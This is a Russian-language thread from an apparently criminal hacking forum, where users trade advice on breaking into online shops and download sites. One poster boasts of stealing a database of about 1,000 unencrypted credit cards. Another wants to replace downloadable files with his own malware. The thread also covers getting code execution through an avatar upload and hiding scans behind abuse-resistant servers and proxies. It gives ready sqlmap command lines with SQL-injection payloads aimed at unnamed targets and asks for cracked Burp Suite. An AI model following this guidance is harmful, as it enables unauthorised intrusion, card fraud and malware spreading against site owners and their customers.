Пожалуйста, обратите внимание, что пользователь заблокирован
Подскажите, увидел в пруфе эксполита sqlmap -c woo.conf --level 5 -risk 3. Что это за конфиг и как он выглядеть должен? Что имел ввиду автор эксполита?
Походу burp изучать надо для начала.Что можно изучить/прочитать человеку который хочет научится веб-взлому?
У меня кстати подобное стремление, только не шопы, а какие-нибудь даунлауд ресурсы дырявые находить, ну или же просто что-то скачиваемое с ресурса, чтобы на своего зверя подменивать.А транзы на таких сайтах вообще есть? А так то очень хорошо и интересно что много шопов которые можно ломануть... а то меня тут напугали что за 3 месяца нихрена не насканили дырок, только время потратили, хотя возможно это просто специально так сказали что бы я не лез в тему))) но другие ведь хакают как то! Чем я то хуже? ... Добывать карты это моя мечта, причём был уже опыт... ломанул как то базу без цвв на 1к кредиток... они были даже не зашифрованы... Спасибо за ответ кстати.
UPD:
А какой сканер уязвимостей лучше всего юзать?
Burpsuite, check:https://portswigger.net/web-securityЧто можно изучить/прочитать человеку который хочет научится веб-взлому?
Тестирую таргет, есть загрузка аватара
Можно грузить что угодно, название и расширение файла ставит сам сервер. Какое расширение поставит не зависит от того, какое мы дадим или от Content-Type, который мы задаем. Если я правильно понял, то там идет guessExtension. В зависимости от самого контента ставится расширение, и скорее он работает по вайтлисту, в котором нет php. Если скормить php то файл будет таким - filename. (без расширения). Пробовал также загрузить разные пнг, жпеги с пхп кодом внутри и двойным расширением, грузится, но файл не работает потому что расширение идет чисто jpg или png. Есть возможность грузить .html,.py,.svg,.xml. Подскажите, что можно сделать с такими форматами файлов? цель - rce.
Можно со своего, только бутылку рядом приготовить надо, от шампанского.Обязательно ли под burp покупать сервак для скана? Или можно со своего компа?
Антиарбузный разумеется. Ни кому не понравится что их сканят, будут абузить, строчить хостеру письма с логами твоего скана.И если обязательно сервак то обязательно ли он должен быть антиарбузовый?
Это очень медленно и большая вероятность false positive/negative.Так же интересует можно ли сканить бурпом тупо через носок тора или это очень не секурно?
Можно через приватные быстрые соксы/хттп, но тут палка о двух концах: либо тебя забанят на сервисе где ты их арендуешь (если правилами сервиса запрещены сканы/взломы и прочая х#йня), либо так же как на сервер полетят абузы и продавец (сервис) проксей попросит на выход, в том случае если ему не по#уй на эти самые абузы. Когда я активно и массово сканил - юзал абузоустойчивые сервера, предварительно согласовывая мои действия с хостером. Сканил без проксей, прямо с сервера. Каждую неделю переезд на новую AS (больше не из-за абуз, а из-за своей ебанутости и паранойи).Или можно ли сканить через обычные платные носки которые не ведут логов?
Зачем здесь подставлять 451' OR '1'='2' --? Это просто пейлоад сканнера для детекта самой скули. Почему только --technique=B? Часто, там где булеаен - бывают и другие векторы, в том числе юнион, тайм-базед и прочие. Просто пометь уязвимый параметр и прочекай все векторы:sudo sqlmap -u "https://Таргет/?p=451'+OR+'1'='2'+--+" -p "p" --data="451' OR '1'='2' -- " --technique=B --level 5 --risk 3 --random-agent -o -b -f -v 5 --batch --dbs --tamper=luanginx
sudo sqlmap -u "https://Таргет/?p=451*" --level=5 --risk=3 --random-agent --dbs --tamper=luanginx -v3
Сервак не нужен, но скан и длительная работа с ним занимает много памяти. Если можешь под вирту 16гб дать - то ок.Обязательно ли под burp покупать сервак для скана? Или можно со своего компа? И если обязательно сервак то обязательно ли он должен быть антиарбузовый? Так же интересует можно ли сканить бурпом тупо через носок тора или это очень не секурно? Или можно ли сканить через обычные платные носки которые не ведут логов? Или они (что тор, что носки) такое просто не выдержат?
Вопрос у новичка. По своему скромному опыту скажу, что автоскан и вправду плодов не приносил. Подскажи как лучше автоматизировать например поиск WordPressa версии < lastest с определенным плагином. А в wpscan можно сканить только один сайт(Сервак не нужен, но скан и длительная работа с ним занимает много памяти. Если можешь под вирту 16гб дать - то ок.
Абузы будут на автосканах, но не много. Возможно одна-две залетит за месяц активной работы. В автосканах пользы практически никакой, разве что чисто посмотреть свой web на дырки, от скрипткиддис. К тому же он шлет очень много ненужных запросов(3-8к на 1 урл на скули), что по моим скромным представляем - пиздец. Ибо это все руками можно проверить в 10-15 запросов, но конечно не удобно.
Тор смысла нету, большинство нормальных ресов будут блочить его. Если поучиться на разных заброшенных - то да. Ну а сокс уже по ситуации, скан в основном идет через get/post запросы, большая пропускная способность канала там не нужна.
Можешь напарсить себе WP сайтов, и прогнать через этот парсер https://github.com/WhatTheSlime/wpcheck на нужный плагин и его версию. А насчет версии самого двикжка WP думаю что то должно быть так же на гитхабе.Подскажи как лучше автоматизировать например поиск WordPressa версии < lastest с определенным плагином
Всем привет, можно актуальную ссылку на крякнутый бёрп. (я умею искать по форуму, но поиск мэтчит каждое слово "burp"). Спасибо
Как тебе удобно так и запускай, но всегда надо под рукой иметь,и линукс, и виндуПод какую ось лучше выбрать сканеры уязвимостей? Всмысле лучше запускать их на винде или на линуксе?